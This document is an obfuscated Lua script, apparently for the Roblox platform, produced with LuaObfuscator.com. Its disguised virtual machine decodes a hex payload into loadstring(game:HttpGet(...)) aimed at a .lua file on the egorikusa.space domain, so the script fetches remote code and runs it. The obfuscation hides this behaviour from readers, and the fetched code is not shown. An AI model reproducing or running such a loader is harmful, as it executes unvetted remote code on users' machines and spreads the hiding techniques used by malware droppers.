--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v101=0;local v102;while true do if (v101==1) then return v102;end if (v101==0) then v102=v5(v85,v19);v19=nil;v101=1;end end else return v85;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v86=0 + 0 + 0 ;local v87;while true do if (v86==(0 + 0)) then v87=(v31/(((1836 -(892 + 65)) -(282 + 595))^(v32-((4 -2) -1))))%(((3029 -1390) -(1523 + 114))^(((v33-((3 -1) -1)) -(v32-(1 -0))) + (1 -0))) ;return v87-(v87%(2 -1)) ;end end else local v88=(621 -((905 -(87 + 263)) + (244 -(67 + 113))))^(v32-(932 -(857 + 74))) ;return (((v31%(v88 + v88))>=v88) and (569 -(367 + 148 + 53))) or (927 -(214 + 713)) ;end end local function v21() local v34=0 -(0 -0) ;local v35;while true do if (v34==(1 + 0 + 0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + ((1950 -(915 + 82)) -(802 + 150)) ;v34=2 -1 ;end end end local function v22() local v36=0 -0 ;local v37;local v38;while true do if (v36==(1 + 0)) then return (v38 * (336 -80)) + v37 ;end if (v36==(1187 -((1898 -829) + 118 + 0))) then v37,v38=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;v36=1 + 0 ;end end end local function v23() local v39=791 -(368 + 423) ;local v40;local v41;local v42;local v43;while true do if (v39==(3 -2)) then return (v43 * (16777234 -((448 -(145 + 293)) + 8))) + (v42 * (252099 -186563)) + (v41 * (698 -(416 + (456 -(44 + 386))))) + v40 ;end if (v39==(0 -0)) then v40,v41,v42,v43=v1(v16,v18,v18 + 3 );v18=v18 + 2 + 2 ;v39=1 -0 ;end end end local function v24() local v44=1486 -(998 + 488) ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(766 -(745 + 21))) then v45=v23();v46=v23();v44=1 + 0 ;end if (v44==(5 -3)) then v49=v20(v46,18 + 3 ,803 -(201 + (2501 -(1869 + 61))) );v50=((v20(v46,1170 -(116 + 286 + 736) )==(4 -3)) and  -(1 + 0)) or ((3 -2) + 0) ;v44=10 -7 ;end if (v44==(10 -7)) then if (v49==(1413 -(447 + 966))) then if (v48==(859 -(814 + (69 -24)))) then return v50 * (0 -0) ;else local v103=0 + 0 + 0 ;while true do if (v103==((0 -0) + 0)) then v49=702 -(354 + 22 + 325) ;v47=885 -((1735 -(1329 + 145)) + 624) ;break;end end end elseif (v49==(3637 -1590)) then return ((v48==(0 + 0)) and (v50 * ((1081 -((1991 -(140 + 831)) + 60))/0))) or (v50 * NaN) ;end return v8(v50,v49-(1037 -((1859 -(1409 + 441)) + 5)) ) * (v47 + (v48/(((2143 -(15 + 703)) -(292 + 338 + 793))^(175 -123)))) ;end if (v44==(4 -3)) then v47=1 + 0 ;v48=(v20(v46,1181 -(1123 + 57) ,8 + 12 ) * ((6 -4)^(1779 -((1198 -(262 + 176)) + 987)))) + v45 ;v44=1915 -(1789 + 124) ;end end end local function v25(v51) local v52=0;local v53;local v54;while true do if (v52==(1722 -(345 + 1376))) then v53=v3(v16,v18,(v18 + v51) -(689 -(89 + 109 + 490)) );v18=v18 + v51 ;v52=2;end if (v52==(8 -6)) then v54={};for v92=1, #v53 do v54[v92]=v2(v1(v3(v53,v92,v92)));end v52=(842 -(660 + 176)) -3 ;end if (v52==0) then v53=nil;if  not v51 then local v99=(145 + 1061) -(696 + 510) ;while true do if (v99==0) then v51=v23();if (v51==(0 -0)) then return "";end break;end end end v52=1 -0 ;end if (v52==(1 + 2)) then return v6(v54);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v55=(function() return 0 + 0 ;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();local v61=(function() return;end)();local v62=(function() return;end)();while true do local v69=(function() return 0;end)();while true do if (v69~=(0 + 0)) then else local v94=(function() return 0;end)();while true do if (v94~=(850 -(20 + 830))) then else if ((1 + 0)==v55) then local v107=(function() return 0;end)();while true do if (v107==(2 + 0)) then v55=(function() return 4 -2 ;end)();break;end if ((0 + 0)~=v107) then else local v148=(function() return 738 -(542 + 196) ;end)();while true do if (v148==(2 -1)) then v107=(function() return 1 -0 ;end)();break;end if (v148==(1769 -(1749 + 20))) then v60=(function() return {v57,v58,nil,v59};end)();v61=(function() return v23();end)();v148=(function() return 1 + 0 ;end)();end end end if (v107==1) then local v149=(function() return 0;end)();while true do if (v149==1) then v107=(function() return 1324 -(1249 + 73) ;end)();break;end if (v149~=0) then else v62=(function() return {};end)();for v170= #" ",v61 do local v171=(function() return 0 -0 ;end)();local v172=(function() return;end)();local v173=(function() return;end)();local v174=(function() return;end)();while true do if (v171~=(0 + 0)) then else v172=(function() return 1145 -(466 + 679) ;end)();v173=(function() return nil;end)();v171=(function() return 2 -1 ;end)();end if (v171~=(2 -1)) then else v174=(function() return nil;end)();while true do if (v172==0) then local v181=(function() return 0 -0 ;end)();while true do if (v181==(1122 -(118 + 1003))) then v172=(function() return 1;end)();break;end if (v181==(0 -0)) then v173=(function() return v21();end)();v174=(function() return nil;end)();v181=(function() return 1901 -(106 + 1794) ;end)();end end end if ((1 + 0)~=v172) then else if (v173== #"]") then v174=(function() return v21()~=(0 + 0) ;end)();elseif (v173==2) then v174=(function() return v24();end)();elseif (v173== #"xnx") then v174=(function() return v25();end)();end v62[v170]=(function() return v174;end)();break;end end break;end end end v149=(function() return 2 -1 ;end)();end end end end end if (v55~=0) then else local v108=(function() return 0;end)();while true do if ((5 -3)==v108) then v55=(function() return 1 + 0 ;end)();break;end if (1==v108) then v58=(function() return {};end)();v59=(function() return {};end)();v108=(function() return 116 -(4 + 110) ;end)();end if (v108==(584 -(57 + 527))) then v56=(function() return function(v158,v159,v160) local v161=(function() return 1427 -(41 + 1386) ;end)();while true do if (v161==(0 + 0)) then local v175=(function() return 103 -(17 + 86) ;end)();while true do if (v175==(0 + 0)) then v158[v159-#"." ]=(function() return v160();end)();return v158,v159,v160;end end end end end;end)();v57=(function() return {};end)();v108=(function() return 1 + 0 ;end)();end end end v94=(function() return 1;end)();end if (v94==(1 -0)) then v69=(function() return 2 -1 ;end)();break;end end end if ((167 -(122 + 44))==v69) then if (v55~=2) then else v60[ #"xnx"]=(function() return v21();end)();for v104= #"<",v23() do local v105=(function() return v21();end)();if (v20(v105, #":", #",")~=(0 -0)) then else local v109=(function() return 0 -0 ;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if ((6 -4)==v109) then if (v20(v111, #" ", #",")~= #">") then else v112[5 -3 ]=(function() return v62[v112[2]];end)();end if (v20(v111,4 -2 ,2)~= #" ") then else v112[ #"gha"]=(function() return v62[v112[ #"gha"]];end)();end v109=(function() return 1 + 2 ;end)();end if (v109~=3) then else if (v20(v111, #"asd", #"-19")~= #".") then else v112[ #"0836"]=(function() return v62[v112[ #"xnxx"]];end)();end v57[v104]=(function() return v112;end)();break;end if (v109==(0 + 0)) then local v151=(function() return 0 + 0 ;end)();while true do if (v151==(1 -0)) then v109=(function() return 1;end)();break;end if (v151==(65 -(30 + 35))) then v110=(function() return v20(v105,2, #"nil");end)();v111=(function() return v20(v105, #"0313",3 + 3 );end)();v151=(function() return 1 + 0 ;end)();end end end if (v109==(1330 -(797 + 532))) then local v152=(function() return 1257 -(1043 + 214) ;end)();while true do if (v152==0) then v112=(function() return {v22(),v22(),nil,nil};end)();if (v110==(1212 -(323 + 889))) then local v176=(function() return 0 + 0 ;end)();local v177=(function() return;end)();while true do if (v176~=(0 + 0)) then else v177=(function() return 0 -0 ;end)();while true do if (v177==(0 -0)) then v112[ #"-19"]=(function() return v22();end)();v112[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v110== #"{") then v112[ #"nil"]=(function() return v23();end)();elseif (v110==(582 -(361 + 219))) then v112[ #"19("]=(function() return v23() -((322 -(53 + 267))^(1146 -(369 + 761))) ;end)();elseif (v110== #"nil") then local v185=(function() return 0 + 0 ;end)();local v186=(function() return;end)();while true do if ((413 -(15 + 398))==v185) then v186=(function() return 0;end)();while true do if (0~=v186) then else v112[ #"gha"]=(function() return v23() -(2^(998 -(18 + 964))) ;end)();v112[ #"0313"]=(function() return v22();end)();break;end end break;end end end v152=(function() return 1 -0 ;end)();end if (v152==(3 -2)) then v109=(function() return 2;end)();break;end end end end end end for v106= #",",v23() do v58,v106,v28=(function() return v56(v58,v106,v28);end)();end return v60;end break;end end end end local function v29(v63,v64,v65) local v66=v63[1 -(0 -0) ];local v67=v63[240 -(64 + 174) ];local v68=v63[1 + 2 ];return function(...) local v70=v66;local v71=v67;local v72=v68;local v73=v27;local v74=1;local v75= -(1 -0);local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v89=216 -(42 + 174) ,v78 do if (v89>=v72) then v76[v89-v72 ]=v77[v89 + (2 -1) + 0 ];else v80[v89]=v77[v89 + 1 + 0 ];end end local v81=(v78-v72) + 1 + 0 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1505 -(363 + 1141) ];if (v83<=(1587 -(1183 + 397))) then if (v83<=(8 -5)) then if ((v83<=(1 + 0 + 0)) or (983==1808)) then if (v83==(0 + 0)) then v80[v82[1977 -(1913 + (1752 -(1121 + 569))) ]]=v65[v82[2 + (215 -(22 + 192)) ]];else v80[v82[5 -3 ]]=v82[1936 -(565 + 1368) ]~=((683 -(483 + 200)) -0) ;end elseif (v83>2) then local v116=1661 -(1477 + 184) ;local v117;while true do if (v116==0) then v117=v82[2 -0 ];v80[v117]=v80[v117](v13(v80,v117 + 1 + 0 ,v75));break;end end else do return;end end elseif ((v83<=5) or (2150<=1197)) then if ((3769>=1173) and (v83==(860 -(564 + 292)))) then v80[v82[2]]();else local v118=0 -0 ;local v119;while true do if (v118==(0 -0)) then v119=v82[306 -(244 + 60) ];v80[v119]=v80[v119](v13(v80,v119 + 1 ,v75));break;end end end elseif ((1485==1485) and (v83==(5 + 1))) then v80[v82[478 -((1504 -(1404 + 59)) + 435) ]]=v65[v82[(2747 -1743) -(938 + 63) ]];else v80[v82[2]]=v82[3 + 0 ];end elseif (v83<=(14 -3)) then if ((v83<=(1134 -(936 + (954 -(468 + 297))))) or (3315<=2782)) then if (v83==8) then local v124=v82[(563 -(334 + 228)) + 1 ];local v125=v80[v82[(5450 -3834) -(1565 + 48) ]];v80[v124 + 1 + 0 ]=v125;v80[v124]=v125[v82[8 -4 ]];else v80[v82[(2067 -927) -(782 + 356) ]]();end elseif ((v83==(277 -(176 + 91))) or (876>=2964)) then local v129=v82[2];local v130,v131=v73(v80[v129](v13(v80,v129 + (2 -1) ,v82[4 -1 ])));v75=(v131 + v129) -(1093 -(277 + 698 + 117)) ;local v132=1875 -(157 + 1718) ;for v146=v129,v75 do local v147=0 + 0 ;while true do if ((0 -0)==v147) then v132=v132 + 1 ;v80[v146]=v130[v132];break;end end end else do return;end end elseif (v83<=13) then if (v83==(40 -28)) then local v133=v82[1020 -(697 + 321) ];local v134=v80[v82[3]];v80[v133 + (2 -1) ]=v134;v80[v133]=v134[v82[8 -4 ]];else local v138=0 -0 ;local v139;local v140;local v141;local v142;while true do if ((1 + 0)==v138) then v75=(v141 + v139) -(1 -0) ;v142=0 -(236 -(141 + 95)) ;v138=1229 -(322 + 905) ;end if ((v138==(613 -(602 + 9 + 0))) or (2232>2497)) then for v167=v139,v75 do v142=v142 + (1190 -(449 + 740)) ;v80[v167]=v140[v142];end break;end if (v138==(872 -(826 + 46))) then v139=v82[949 -(245 + 702) ];v140,v141=v73(v80[v139](v13(v80,v139 + (3 -2) ,v82[1 + 2 ])));v138=1899 -(260 + 1638) ;end end end elseif (v83==14) then v80[v82[442 -(382 + 58) ]]=v82[9 -6 ]~=(0 + 0) ;else v80[v82[2]]=v82[5 -2 ];end v74=v74 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403343Q00682Q7470733A2Q2F65676F72696B7573612E73706163652F3238646636393534356135653163626632313061663539372E6C756100093Q00124Q00013Q00122Q000100023Q00200C000100010003001207000300044Q0001000400014Q000D000100044Q00035Q00022Q00093Q000100012Q000B3Q00017Q00",v9(),...);
